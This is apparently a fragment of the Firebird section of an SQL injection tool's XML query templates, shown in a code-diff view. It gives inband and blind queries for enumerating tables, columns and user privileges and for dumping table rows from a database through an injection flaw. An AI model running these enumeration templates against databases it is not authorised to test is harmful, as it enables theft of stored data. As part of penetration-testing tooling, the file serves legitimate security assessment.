<inband query="SELECT RDB$RELATION_NAME FROM RDB$RELATIONS WHERE RDB$VIEW_BLR IS NULL AND (RDB$SYSTEM_FLAG IS NULL OR RDB$SYSTEM_FLAG = 0)"/>
|
||||
<blind query="SELECT FIRST 1 SKIP %d RDB$RELATION_NAME FROM RDB$RELATIONS WHERE RDB$VIEW_BLR IS NULL AND (RDB$SYSTEM_FLAG IS NULL OR RDB$SYSTEM_FLAG = 0)" count="SELECT COUNT(RDB$RELATION_NAME) FROM RDB$RELATIONS WHERE RDB$VIEW_BLR IS NULL AND (RDB$SYSTEM_FLAG IS NULL OR RDB$SYSTEM_FLAG = 0)"/>
|
||||
</tables>
|
||||
<dump_table>
|
||||
<inband query="SELECT %s FROM %s"/>
|
||||
<blind query="SELECT FIRST 1 SKIP %d %s FROM %s" count="SELECT COUNT(*) FROM %s"/>
|
||||
</dump_table>
|
||||
<privileges>
|
||||
<inband query="SELECT RDB$USER, RDB$PRIVILEGE FROM RDB$USER_PRIVILEGES" condition="RDB$USER"/>
|
||||
<blind query="SELECT FIRST 1 SKIP %d DISTINCT(RDB$PRIVILEGE) FROM RDB$USER_PRIVILEGES WHERE RDB$USER='%s'" count="SELECT COUNT(DISTINCT(RDB$PRIVILEGE)) FROM RDB$USER_PRIVILEGES WHERE RDB$USER='%s'"/>
|
||||
</privileges>
|
||||
<dbs/>
|
||||
<columns>
|
||||
<!--<inband query="SELECT r.RDB$FIELD_NAME, CASE f.RDB$FIELD_TYPE WHEN 261 THEN 'BLOB' WHEN 14 THEN 'CHAR' WHEN 40 THEN 'CSTRING' WHEN 11 THEN 'D_FLOAT' WHEN 27 THEN 'DOUBLE' WHEN 10 THEN 'FLOAT' WHEN 16 THEN 'INT64' WHEN 8 THEN 'INTEGER' WHEN 9 THEN 'QUAD' WHEN 7 THEN 'SMALLINT' WHEN 12 THEN 'DATE' WHEN 13 THEN 'TIME' WHEN 35 THEN 'TIMESTAMP' WHEN 37 THEN 'VARCHAR' ELSE 'UNKNOWN' END AS field_type FROM RDB$RELATION_FIELDS r LEFT JOIN RDB$FIELDS f ON r.RDB$FIELD_SOURCE = f.RDB$FIELD_NAME WHERE r.RDB$RELATION_NAME='%s'"/>-->
|
||||
<inband query="SELECT r.RDB$FIELD_NAME, f.RDB$FIELD_TYPE FROM RDB$RELATION_FIELDS r LEFT JOIN RDB$FIELDS f ON r.RDB$FIELD_SOURCE = f.RDB$FIELD_NAME WHERE r.RDB$RELATION_NAME='%s'"/>
|
||||
<blind query="SELECT r.RDB$FIELD_NAME FROM RDB$RELATION_FIELDS r LEFT JOIN RDB$FIELDS f ON r.RDB$FIELD_SOURCE = f.RDB$FIELD_NAME WHERE r.RDB$RELATION_NAME='%s'" query2="SELECT f.RDB$FIELD_TYPE FROM RDB$RELATION_FIELDS r LEFT JOIN RDB$FIELDS f ON r.RDB$FIELD_SOURCE = f.RDB$FIELD_NAME WHERE r.RDB$RELATION_NAME='%s' AND r.RDB$FIELD_NAME='%s'" count="SELECT COUNT(r.RDB$FIELD_NAME) FROM RDB$RELATION_FIELDS r LEFT JOIN RDB$FIELDS f ON r.RDB$FIELD_SOURCE = f.RDB$FIELD_NAME WHERE r.RDB$RELATION_NAME='%s'"/>
|
||||
</columns>
|
||||
</dbms>
|
||||
|
||||
</root>
|
||||
|
|
Loading…
Reference in New Issue
Block a user